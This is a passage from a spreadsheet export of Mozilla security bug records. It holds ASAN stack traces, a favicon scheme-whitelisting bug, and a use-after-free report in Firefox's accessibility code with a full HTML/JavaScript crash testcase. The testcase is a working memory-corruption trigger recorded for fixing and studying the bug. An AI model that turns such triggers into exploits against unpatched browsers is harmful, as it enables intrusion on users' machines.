    #23 0x7f8fe8673d57 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1178
    #24 0x7f8fe8673d57 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1144
    #25 0x7f8fe867bef2 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:941:10
    #26 0x7f8ff5116307 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #27 0x7f8ff5116307 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #28 0x7f8ff50fe71a in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:593:10
    #29 0x7f8ff50fe71a in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3075
    #30 0x7f8ff50e0748 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #31 0x7f8ff5116c76 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #32 0x7f8ff51188c2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #33 0x7f8ff564c6b0 in js::fun_apply(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/JSFunction.cpp:1180:10
    #34 0x7f8ff5116307 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #35 0x7f8ff5116307 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #36 0x7f8ff50fe71a in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:593:10
    #37 0x7f8ff50fe71a in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3075
    #38 0x7f8ff50e0748 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #39 0x7f8ff5116c76 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #40 0x7f8ff51188c2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #41 0x7f8ff5cfc427 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2558:10
    #42 0x7f8fe8659012 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:993:17
    #43 0x7f8fe622ff98 in PrepareAndDispatch /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:127:37
    #44 0x7f8fe622ee6a in SharedStub (/firefox/libxul.so+0x4a09e6a)
    #45 0x7f8ff4e5617d in nsXREDirProvider::DoStartup() /builds/worker/workspace/build/src/toolkit/xre/nsXREDirProvider.cpp:1010:11
    #46 0x7f8ff4e2bd2b in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4409:16
    #47 0x7f8ff4e2f538 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4727:8
    #48 0x7f8ff4e30dc9 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4811:21
    #49 0x55788cd8264c in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:212:22
    #50 0x55788cd8264c in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:291
    #51 0x7f9009ccdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:542:5 in AssertWorkerThread
Shadow bytes around the buggy address:
  0x0c2e80042650: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80042660: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c2e80042670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e80042680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80042690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c2e800426a0: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800426b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800426c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800426d0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c2e800426e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e800426f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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18599==ABORTING</t>
        </is>
      </c>
      <c r="X629" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="630">
      <c r="A630" t="n">
        <v>932335</v>
      </c>
      <c r="B630" t="inlineStr">
        <is>
          <t>2013-10-29 08:44:51 -0700</t>
        </is>
      </c>
      <c r="C630" t="inlineStr">
        <is>
          <t>Don't allow content to request favicons from non-whitelisted schemes</t>
        </is>
      </c>
      <c r="D630" t="inlineStr">
        <is>
          <t>2020-12-21 10:32:11 -0800</t>
        </is>
      </c>
      <c r="E630" t="n">
        <v>1</v>
      </c>
      <c r="F630" t="n">
        <v>1</v>
      </c>
      <c r="G630" t="n">
        <v>6</v>
      </c>
      <c r="H630" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I630" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J630" t="inlineStr">
        <is>
          <t>Favicon Handling</t>
        </is>
      </c>
      <c r="K630" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L630" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M630" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N630" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O630" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P630" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main49+]</t>
        </is>
      </c>
      <c r="Q630" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R630" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S630" t="inlineStr">
        <is>
          <t>Firefox 49</t>
        </is>
      </c>
      <c r="T630" t="n">
        <v>1</v>
      </c>
      <c r="U630" t="n">
        <v>0</v>
      </c>
      <c r="V630" t="n">
        <v>42</v>
      </c>
      <c r="W630" t="inlineStr">
        <is>
          <t>This probably involves some browser.js hackery.
bnicholson spotted this:
http://people.mozilla.org/~bnicholson/test/favicon_fail.html
Currently that crashes the browser. After I fix that code (Bug 926430), it'll allow arbitrary fetches from our JAR.</t>
        </is>
      </c>
      <c r="X630" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="631">
      <c r="A631" t="n">
        <v>1363723</v>
      </c>
      <c r="B631" t="inlineStr">
        <is>
          <t>2017-05-10 06:53:25 -0700</t>
        </is>
      </c>
      <c r="C631" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation</t>
        </is>
      </c>
      <c r="D631" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:58 -0700</t>
        </is>
      </c>
      <c r="E631" t="n">
        <v>1</v>
      </c>
      <c r="F631" t="n">
        <v>1</v>
      </c>
      <c r="G631" t="n">
        <v>3</v>
      </c>
      <c r="H631" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I631" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J631" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K631" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L631" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M631" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N631" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O631" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P631" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q631" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R631" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S631" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T631" t="n">
        <v>1</v>
      </c>
      <c r="U631" t="n">
        <v>0</v>
      </c>
      <c r="V631" t="n">
        <v>69</v>
      </c>
      <c r="W631" t="inlineStr">
        <is>
          <t>Created attachment 8866329
crash.html (testcase, crashes firefox)
The following testcase crashes the latest ASAN build of Firefox.
&lt;script&gt;
function start() {
	fuzzPriv.enableAccessibility();
	o0=document;
	o11=document.createElement('input');
	o11.id='id2';
	o0.designMode='on';
	o291=document.createElement("div");
	o291.id="id2";
	document.documentElement.appendChild(o291);
        o627=document.createElementNS('http://www.w3.org/2000/svg','svg');
	o688=document.createElementNS('http://www.w3.org/2000/svg','filter');
        o707=document.createElementNS('http://www.w3.org/2000/svg','feComponentTransfer');
        o688.appendChild(o707);
        o712=document.createElementNS('http://www.w3.org/2000/svg','feDisplacementMap');
        o712.setAttribute('id','id4');
        o688.appendChild(o712);
        o627.appendChild(o688);
        o817=document.createElement('iframe');
        document.documentElement.appendChild(o627);
        document.documentElement.appendChild(o11);
        document.documentElement.appendChild(o817);
	o707.setAttribute('aria-owns','id2 id4');
	o817.setAttribute('aria-owns','id4');
	location.reload();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==12988==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020001bd7f0 at pc 0x7f4dbdc8cfaf bp 0x7ffff59e5d10 sp 0x7ffff59e5d08
READ of size 8 at 0x6020001bd7f0 thread T0 (Web Content)
    #0 0x7f4dbdc8cfae in Length /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:398:37
    #1 0x7f4dbdc8cfae in RefPtr&lt;mozilla::a11y::Accessible&gt;* nsTArray_Impl&lt;RefPtr&lt;mozilla::a11y::Accessible&gt;, nsTArrayInfallibleAllocator&gt;::InsertElementAt&lt;mozilla::a11y::Accessible*&amp;, nsTArrayInfallibleAllocator&gt;(unsigned long, mozilla::a11y::Accessible*&amp;) /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2133
    #2 0x7f4dbdc8c880 in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2117:17
    #3 0x7f4dbdbfc9ab in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:801:18
    #4 0x7f4dbb64f2f5 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1789:12
    #5 0x7f4dbb65da33 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:300:7
    #6 0x7f4dbb65d704 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:322:5
    #7 0x7f4dbb65fd2b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:752:5
    #8 0x7f4dbb65fd2b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:665
    #9 0x7f4dbb65f92f in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:566:9
    #10 0x7f4dbbe7dd62 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #11 0x7f4db6152219 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #12 0x7f4db5e1dafd in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1541:28
    #13 0x7f4db5d76ba4 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2021:25
    #14 0x7f4db5d73a37 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1956:17
    #15 0x7f4db5d75744 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1825:5
    #16 0x7f4db5d75d76 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1858:15
    #17 0x7f4db4fe3b40 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
    #18 0x7f4db4fe0588 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
    #19 0x7f4db5d7eb71 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #20 0x7f4db5ce1f90 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #21 0x7f4db5ce1f90 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #22 0x7f4db5ce1f90 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #23 0x7f4dbafbe58f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #24 0x7f4dbe5abf07 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #25 0x7f4db5ce1f90 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #26 0x7f4db5ce1f90 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #27 0x7f4db5ce1f90 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #28 0x7f4dbe5aba35 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:709:34
    #29 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #30 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #31 0x7f4dd076582f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #32 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x6020001bd7f0 is located 0 bytes inside of 8-byte region [0x6020001bd7f0,0x6020001bd7f8)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f4db4ed633d in RawRemove /home/worker/workspace/build/src/xpcom/ds/PLDHashTable.cpp:661:3
    #2 0x7f4db4ed633d in PLDHashTable::Remove(void const*) /home/worker/workspace/build/src/xpcom/ds/PLDHashTable.cpp:631
    #3 0x7f4dbdc8d1ed in RemoveEntry /home/worker/workspace/build/src/obj-firefox/dist/include/nsTHashtable.h:171:12
    #4 0x7f4dbdc8d1ed in Remove /home/worker/workspace/build/src/obj-firefox/dist/include/nsBaseHashtable.h:165
    #5 0x7f4dbdc8d1ed in mozilla::a11y::DocAccessible::MoveChild(mozilla::a11y::Accessible*, mozilla::a11y::Accessible*, int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2199
    #6 0x7f4dbdc8c7fd in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2115:9
    #7 0x7f4dbdbfc9ab in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:801:18
    #8 0x7f4dbb64f2f5 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1789:12
    #9 0x7f4dbb65da33 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:300:7
    #10 0x7f4dbb65d704 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:322:5
    #11 0x7f4dbb65fd2b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:752:5
    #12 0x7f4dbb65fd2b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:665
    #13 0x7f4dbb65f92f in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:566:9
    #14 0x7f4dbbe7dd62 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #15 0x7f4db6152219 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #16 0x7f4db5e1dafd in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1541:28
    #17 0x7f4db5d76ba4 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2021:25
    #18 0x7f4db5d73a37 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1956:17
    #19 0x7f4db5d75744 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1825:5
    #20 0x7f4db5d75d76 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1858:15
    #21 0x7f4db4fe3b40 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
    #22 0x7f4db4fe0588 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
    #23 0x7f4db5d7eb71 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #24 0x7f4db5ce1f90 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #25 0x7f4db5ce1f90 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #26 0x7f4db5ce1f90 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #27 0x7f4dbafbe58f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #28 0x7f4dbe5abf07 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #29 0x7f4db5ce1f90 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #30 0x7f4db5ce1f90 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #31 0x7f4db5ce1f90 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #32 0x7f4dbe5aba35 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:709:34
    #33 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #34 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #35 0x7f4dd076582f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f4dbdc8cd15 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f4dbdc8cd15 in nsTArray&lt;RefPtr&lt;mozilla::a11y::Accessible&gt; &gt;* nsClassHashtable&lt;nsPtrHashKey&lt;mozilla::a11y::Accessible&gt;, nsTArray&lt;RefPtr&lt;mozilla::a11y::Accessible&gt; &gt; &gt;::LookupOrAdd&lt;&gt;(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/obj-firefox/dist/include/nsClassHashtable.h:153
    #4 0x7f4dbdc8c163 in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2044:59
    #5 0x7f4dbdbfc9ab in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:801:18
    #6 0x7f4dbb64f2f5 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1789:12
    #7 0x7f4dbb65da33 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:300:7
    #8 0x7f4dbb65d704 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:322:5
    #9 0x7f4dbb65fd2b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:752:5
    #10 0x7f4dbb65fd2b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:665
    #11 0x7f4dbb65f92f in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:566:9
    #12 0x7f4dbbe7dd62 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #13 0x7f4db6152219 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #14 0x7f4db5e1dafd in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1541:28
    #15 0x7f4db5d76ba4 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2021:25
    #16 0x7f4db5d73a37 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1956:17
    #17 0x7f4db5d75744 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1825:5
    #18 0x7f4db5d75d76 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1858:15
    #19 0x7f4db4fe3b40 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
    #20 0x7f4db4fe0588 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
    #21 0x7f4db5d7eb71 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #22 0x7f4db5ce1f90 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #23 0x7f4db5ce1f90 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #24 0x7f4db5ce1f90 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #25 0x7f4dbafbe58f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #26 0x7f4dbe5abf07 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #27 0x7f4db5ce1f90 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #28 0x7f4db5ce1f90 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #29 0x7f4db5ce1f90 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #30 0x7f4dbe5aba35 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:709:34
    #31 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #32 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #33 0x7f4dd076582f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:398:37 in Length
Shadow bytes around the buggy address:
  0x0c048002faa0: fa fa 00 00 fa fa 00 00 fa fa fd fd fa fa fd fd
  0x0c048002fab0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa
  0x0c048002fac0: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c048002fad0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c048002fae0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
=&gt;0x0c048002faf0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa[fd]fa
  0x0c048002fb00: fa fa fd fd fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c048002fb10: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c048002fb20: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa 00 00
  0x0c048002fb30: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c048002fb40: fa fa fd fd fa fa 00 00 fa fa 00 00 fa fa 00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2988==ABORTING</t>
        </is>
      </c>
      <c r="X631" t="n">
        <v>1</v>
